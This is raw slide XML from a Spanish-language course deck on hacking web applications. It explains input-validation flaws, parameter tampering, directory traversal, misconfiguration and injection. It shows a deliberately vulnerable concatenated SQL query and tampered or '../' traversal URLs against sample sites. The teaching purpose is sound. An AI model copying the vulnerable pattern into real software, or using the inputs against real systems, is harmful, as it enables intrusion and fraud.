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410" r:id="rId85"/>
    <p:sldId id="409" r:id="rId86"/>
    <p:sldId id="411" r:id="rId87"/>
    <p:sldId id="398" r:id="rId88"/>
    <p:sldId id="412" r:id="rId89"/>
    <p:sldId id="399" r:id="rId90"/>
    <p:sldId id="413" r:id="rId91"/>
    <p:sldId id="400" r:id="rId92"/>
    <p:sldId id="414" r:id="rId93"/>
    <p:sldId id="401" r:id="rId94"/>
    <p:sldId id="415" r:id="rId95"/>
    <p:sldId id="402" r:id="rId96"/>
    <p:sldId id="416" r:id="rId97"/>
    <p:sldId id="403" r:id="rId98"/>
    <p:sldId id="417" r:id="rId99"/>
    <p:sldId id="405" r:id="rId100"/>
    <p:sldId id="418" r:id="rId101"/>
    <p:sldId id="406" r:id="rId102"/>
    <p:sldId id="419" r:id="rId103"/>
    <p:sldId id="407" r:id="rId104"/>
    <p:sldId id="408" r:id="rId105"/>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60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smtClean="0"/>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406498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smtClean="0"/>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7.7.2014</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2340254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smtClean="0"/>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7.7.2014</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smtClean="0"/>
              <a:t>13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Hackeando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> Aplicaciones Web</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Julio Javier Iglesias Pérez</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1428208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Amenazas a las aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de autenticación. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Ataques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>a los servicios Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Manipulación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>oculta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Re direccionamiento </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>no válido.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Ataque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de fijación de sesión.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Ejecución </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de archivos maliciosos.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13207710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smtClean="0"/>
              <a:t>Testear Servicios Web</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16249734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346325" y="491718"/>
            <a:ext cx="4451350" cy="5874563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49173696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smtClean="0"/>
              <a:t>Testear Ajax</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364723184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558869" y="1412776"/>
            <a:ext cx="6291518" cy="3987140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4043832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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Muchas Gracias!</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3687955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Entradas no válidas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Los defectos de validación de entradas se refiere a una vulnerabilidad de aplicación Web donde la entrada desde el cliente no es validada antes de ser procesada por las aplicaciones Web y los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>servidores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>back-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>. Un atacante explota una defecto de validación de entrada para realizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>cross-site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> scripting, buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>, ataques de inyección, etc. eso resulta en robo de datos y mal funcionamiento del sistema.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Ej.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Browser Post </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>juggyboy.com/login.aspx?user=jasons@pass=springfield </a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2635943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Consulta Modificada</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = "select * from Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user = '" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + "' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + "'"r</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367477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Manipulación de parámetros/formularios</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Un ataque de manipulación de parámetro implica la manipulación de parámetros intercambiados entre el cliente y el servidor para modificar datos de la aplicación como credenciales de usuarios y permisos, precios, cantidad de productos. Un ataque de manipulación de parámetros explota vulnerabilidades en integridad y mecanismos de validación lógica que pueden resultar en XSS, SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414904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Manipulación de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>parámetros/formularios</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Manipulación de datos URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.juggybank.com/custo.asp?profile=21&amp;debit=2500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>por este</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.juggybank.com/custo.asp?profile=82&amp;debit=1500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Otros parámetros pueden ser cambiados incluyendo atributos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.juggybank.com/stat.asp?pg=531%status=view</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.juggybank.com/stat.asp?pg=531%status=delete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87752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Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1600200"/>
            <a:ext cx="8640960" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Permite a los atacantes acceder a directorios restringidos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>incluyendo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>el código fuente de la aplicación, configuración y archivos críticos del sistema, y ejecutar comandos desde fuera del directorio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>raíz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>del Servidor Web. Los atacantes pueden manipular variables de archivos referencia con secuencias "punto-punto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>slash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>(../)"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.juggyboy.com/process.aspx=../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>algun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directorio/algún </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>archivo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250170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Mala configuración de seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2700" dirty="0"/>
              <a:t>Cualquier configuración por defecto o cualquier aplicación incorrecta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2700" dirty="0" smtClean="0"/>
              <a:t>Fácil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2700" dirty="0"/>
              <a:t>Explotación: Utilizando vulnerabilidades de mala configuración, los atacantes pueden obtener acceso no autorizado a las cuentas por defecto, leer páginas no utilizadas, explotar defectos no parchados, leer o escribir archivos y directorios no protegidos, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2700" dirty="0" smtClean="0"/>
              <a:t>Predominio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2700" dirty="0"/>
              <a:t>común: La mala configuración puede ocurrir en cualquier nivel de la pila de aplicación, incluyendo la plataforma, servidor Web, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2700" dirty="0"/>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2700" dirty="0"/>
              <a:t>, y código a medida.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1894150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Mala configuración de seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Ejemplo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>La consola de administración del servidor es automáticamente instalada y no quitada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Las cuentas por defecto no son cambiadas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>El atacante descubre páginas de administración estándar en el servidor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> con las contraseñas por defecto y se hace cargo.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2048335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Inyección de fallas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>1. Son vulnerabilidades en las aplicaciones Web que a los datos no confiados ser interpretados y ejecutados como parte de un comando o consulta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>2. Loas atacantes inyectan fallas construyendo comandos o consultas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>maliciosa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>que resultan en pérdida o corrupción de datos, falta de responsabilidad, o denegación de acceso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>3. Las fallas inyectadas son prevalentes en código heredado, a menudo encontrado en SQL, LDAP, y consultas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>, etc. y puede ser descubierto fácilmente por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>escaners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>de vulnerabilidad de aplicaciones y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>fuzzers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="746969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Ataques SQL </a:t>
            </a:r>
            <a:r>
